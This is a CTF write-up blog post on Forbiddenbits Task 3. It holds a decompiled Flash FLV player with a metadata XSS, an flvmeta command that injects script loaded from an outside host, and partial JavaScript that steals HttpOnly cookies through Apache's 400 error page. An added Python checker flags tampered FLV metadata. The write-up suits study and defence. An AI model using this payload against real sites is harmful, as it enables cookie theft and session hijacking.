Forbiddenbits - Task 3

Task 3 Solution

"The truth lays behind the earth" is the hint pointing to the Flash-based .flv player.
After decompiling the player we can see the vulnerable part of the code: the width and height fields taken from the .flv metadata are concatenated, unescaped, into a javascript: URL, which gives an exploitable XSS through crafted metadata:
```actionscript
ns.onMetaData = function (obj) {
  metaWidth = obj.width;
  metaHeight = obj.height;
  duration = obj.duration;
  flv._visible = 1;
  if (jsCallback) {
    // metaWidth / metaHeight come straight from the file and are never validated or escaped
    getURL("javascript:flvStart(\'" + metaWidth + "\',\'" + metaHeight + "\')", "");
  } // end if
};
```
Then we remembered the recent Apache vulnerability in the default 400 error page (http://www.exploit-db.com/exploits/18442/), which allows HttpOnly-protected cookies to be stolen. So we made a malicious .flv file with modified metadata.

Here we hit a small problem: the flvmeta editor could only add metadata tags to the .flv, so the final file ended up with duplicated metadata. To work around this, a few lines in flvmeta were commented out.
Patch for flvmeta (info.c):
```c
/* excerpt of the lines that were commented out (the lines are cut off in the original post) */
amf_associative_array_add(meta->on_metadata, "lastkeyframetimestamp", amf_nu
if (info->video_width > 0)
amf_associative_array_add(meta->on_metadata, "width", amf_number_new(inf
if (info->video_height > 0)
amf_associative_array_add(meta->on_metadata, "height", amf_number_new(in

video_data_rate = ((info->real_video_data_size / 1024.0) * 8.0) / duration;
```

Then we made an EVIL.flv file which injects a JS exploit into the HTML page, and finally this exploit stole ALL the user's cookies. A link to this magic file was sent through the feedback form on the site.

```shell
./flvmeta -U --add=width="'+(e=document.createElement('script'),e.src='http://kyprizel.net/ctf/pureevilpart3.js',document.body.appendChild(e))+'" EVIL.flv
```
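As an added example (not from the writeup and not flvmeta's code), this is the check an upload handler or file scanner could run on user-supplied .flv files to catch this kind of tampering: it parses the AMF0 onMetaData tag and reports fields the player treats as numbers (width, height, ...) that arrive as strings, which is exactly what the flvmeta --add command above writes. The sample FLVs and the field list are constructed for the demo; the parser covers only the AMF0 types an onMetaData tag normally contains (number, boolean, string, ECMA array).

```python
import struct

def amf0_read(buf, pos):
    """Decode one AMF0 value at buf[pos]; returns (value, next_pos). Covers the types onMetaData uses."""
    t, pos = buf[pos], pos + 1
    if t == 0x00:                                    # number: big-endian IEEE 754 double
        return struct.unpack(">d", buf[pos:pos + 8])[0], pos + 8
    if t == 0x01:                                    # boolean: one byte
        return bool(buf[pos]), pos + 1
    if t == 0x02:                                    # string: 2-byte length + UTF-8 bytes
        n = struct.unpack(">H", buf[pos:pos + 2])[0]
        return buf[pos + 2:pos + 2 + n].decode("utf-8", "replace"), pos + 2 + n
    if t == 0x08:                                    # ECMA array: count, key/value pairs, 00 00 09 end marker
        pos, out = pos + 4, {}
        while buf[pos:pos + 3] != b"\x00\x00\x09":
            n = struct.unpack(">H", buf[pos:pos + 2])[0]
            key = buf[pos + 2:pos + 2 + n].decode("utf-8", "replace")
            out[key], pos = amf0_read(buf, pos + 2 + n)
        return out, pos + 3
    raise ValueError("unsupported AMF0 type 0x%02x at offset %d" % (t, pos - 1))

def flv_metadata(data):
    """Walk the FLV tag stream and return the onMetaData dictionary (None if the file has none)."""
    if data[:3] != b"FLV": raise ValueError("not an FLV file")
    pos = struct.unpack(">I", data[5:9])[0] + 4         # header length + PreviousTagSize0
    while pos + 11 <= len(data):
        tag_type, size = data[pos], int.from_bytes(data[pos + 1:pos + 4], "big")
        body = data[pos + 11:pos + 11 + size]
        if tag_type == 18:                               # script data tag
            name, p = amf0_read(body, 0)
            if name == "onMetaData":
                return amf0_read(body, p)[0]
        pos += 11 + size + 4                             # tag header, body, trailing PreviousTagSize

NUMERIC_FIELDS = ("width", "height", "duration", "framerate", "videodatarate", "audiodatarate")
def suspicious_fields(meta):
    """Fields the player splices into its javascript: URL as numbers but which carry another type."""
    return {k: v for k, v in meta.items() if k in NUMERIC_FIELDS and not isinstance(v, float)}

# Constructed sample files for the demo (not the CTF's files): a clean clip and one whose width
# is a string, which is what `flvmeta --add=width=...` writes into the metadata.
def _amf_str(s): return b"\x02" + struct.pack(">H", len(s.encode())) + s.encode()
def _amf_num(x): return b"\x00" + struct.pack(">d", x)
def build_flv(meta):
    pairs = b"".join(struct.pack(">H", len(k)) + k.encode() + v for k, v in meta.items())
    body = _amf_str("onMetaData") + b"\x08" + struct.pack(">I", len(meta)) + pairs + b"\x00\x00\x09"
    tag = b"\x12" + len(body).to_bytes(3, "big") + bytes(7) + body   # type 18, size, timestamp(4), streamId(3)
    return b"FLV\x01\x05" + struct.pack(">I", 9) + bytes(4) + tag + struct.pack(">I", len(tag))
CLEAN = build_flv({"duration": _amf_num(12.5), "width": _amf_num(640), "height": _amf_num(360)})
TAMPERED = build_flv({"duration": _amf_num(12.5), "width": _amf_str("640'+x+'"), "height": _amf_num(360)})
```

Rejecting a file whose `suspicious_fields` result is non-empty (or re-muxing it with numeric values) closes the injection path on the server side even while the player itself stays unpatched.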

JS pureevilpart3.js:
```javascript
var today = new Date();
var expire = new Date();
expire.setTime(today.getTime() + 2000);           // the planted cookies expire after 2 seconds
// oversize the cookie header so the next request hits Apache's default 400 error page
for (j = 0; j <= 1000; ++j) {
  for (i = 0; i < 10; ++i) {
    document.cookie = "z" + i + "=" + padding + "; expires=" + expire.toGMTString() + "; path=/;";
  }
}
function handler() {
  if (!gotCookie && this.responseText.length > 1) {
    // the 400 page echoes the request headers, Cookie included, back into the body
    text = /(Cookie[^;]*)/i.exec(this.responseText);
  }
}
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = handler;
xhr.open("GET", "/httponly.php");
// padding, gotCookie and the rest of the script are not shown in the post
```


This page contains a single entry by Юрий Леонычев published on February 13, 2012 3:40 PM.
